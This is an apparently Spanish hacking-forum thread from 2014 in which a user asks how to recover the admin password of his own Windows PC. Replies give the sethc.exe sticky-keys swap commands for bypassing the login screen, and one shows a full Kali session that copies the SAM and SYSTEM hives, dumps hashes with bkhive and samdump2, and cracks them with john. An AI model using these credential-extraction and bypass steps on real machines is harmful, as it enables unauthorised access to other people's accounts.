[SOLUCIONADO] Conseguir contraseñas admin

Iniciado por rollth, Abril 30, 2014, 05:45:51 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Abril 30, 2014, 05:45:51 PM Ultima modificación: Agosto 17, 2014, 12:11:48 PM por Expermicid
Buenas, me pregunta si alguno me podría explicar como conseguir la contraseña de admin de un ordenador pero sin cambiarlo. Es ordenador propio y aseguro que es totalmente ético  ::)
Muchas gracias de antemano.
RollthBuen hacker mejor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Hola,
Puedes probar de hacer un cd booteable o pendrive booteable con Ophcrack:
Cita de:  WikipediaOphcrack es una herramienta para crackear las contraseñas de Windows basada en las tablas Rainbow.1 Es una implementación muy eficiente de las tablas Rainbow hecha por los inventores de este método. Viene con una Interfaz Gráfica de Usuario GTK+ y corre bajo Windows, Mac OS X (CPU Intel) y también en Linux.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Saludos

Gn0m3

Muchas gracias, pero eso es lo que hice jeje :( , lo intente con un pen pero no lo consegui, lo intentare de nuevo.
Muchas gracias de todas formas.
RollthBuen hacker mejor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Buenas, googleando un poco he visto que las contraseñas estan guardadas en un archivo que se llama SAM en la ruta: C:\Windows\System32\config la cosa es que no se como podria decodificarlo, alguna idea?
Gracias de antemano.
RollthBuen hacker mejor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El archivo "sethc.exe" es un ejecutable que se activa cuando pulsamos repetidamente la tecla SHIFT (Teclas especiales), bueno este archivo tambien funciona en la pagina principal de windows, la que te pide la contraseña de windows. La idea es utilizar un disco de intstalacion de windows para entrar en modo reparacion, acceder al cmd y reemplazar este archivo por "cmd.exe".
Normalmete en el CD de instalacion nos ubicara en "X:" y nosostros nos tendremos que reubicar en "C:" o "D:" segun el equipo. Los comandos serian estos:

X:> D:
D:> cd windows\system32
D:\windows\system32> ren sethc.exe sethc.000
D:\windows\system32> copy cmd.exe sethc.exe

Hecho esto reiniciamos normalmente, cuando nos pida la pass pulsamos repetidamente SHIFT y nos saldra una ventana de cmd, con el comando "control userpasswords2" nos iniciara el administrador de contraseñas de forma grafica y facilmente podremos quitar la contraseña del usuario.
Acuerdate de volver a renombrar "sethc.exe" para que el ejecutable vuelba a funcionar.

Saludos

Mayo 01, 2014, 09:52:06 PM #5 Ultima modificación: Mayo 01, 2014, 09:56:18 PM por fermino
Si, pero la cosa es que el no busca cómo cambiarla, sino como desencriptar la actual...
Visita mi blog: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Si tenes privs con mimikatz

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Twitter: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Hola a todos.
Bueno yo lo hago con john, si cuentas con bt5 o kali-linux lo puedes hacer de la siguiente forma:

root@kali:~# mkdir temp

root@kali:~# cp /media/Sistema/Windows/System32/config/SAM /root/temp

root@kali:~# cp /media/Sistema/Windows/System32/config/SYSTEM /root/temp

root@kali:~# cp /root/darc0des/passwdpro.txt /root/temp

root@kali:~# cd /temp

root@kali:/tem#  bkhive SYSTEM hive
bkhive 1.1.1 by Objectif Securite
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
original author: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Root Key : CMI-CreateHive{2A7FB991-7BBE-4F9D-B91E-7CB51D4737F5}
Default ControlSet: 001
Bootkey: 2a4578dbf14272c84a45df64cdfe9ccd

root@kali:/temp# samdump2 SAM hive > hashes.txt
samdump2 1.1.1 by Objectif Securite
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
original author: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Root Key : CMI-CreateHive{C4E7BA2B-68E8-499C-B1A1-371AC8D717C7}

root@kali:~# john --format=nt -w= /root/temp/passwdpro.txt /root/temp/hashes.txt
Loaded 53 password hashes with no different salts (NT MD4 [128/128 X2 SSE2-16])
                                        (Administrador)
superpassword            (shirylmfao)       
guesses: 0  time: 0:00:00:00 DONE (Tue May  6 10:28:12 2014)  c/s: 669800  trying: paagal - sss

bueno salen algunas cosas mas pero lo que te interesa solo es el user, que en este caso es shirylmfao y el pass que es superpassword, claro esto solo va a darte resultados si la clave esta en el diccionario, de lo contrario no vas a obtener la clave.


"La Imaginación es más importante que el Conocimiento"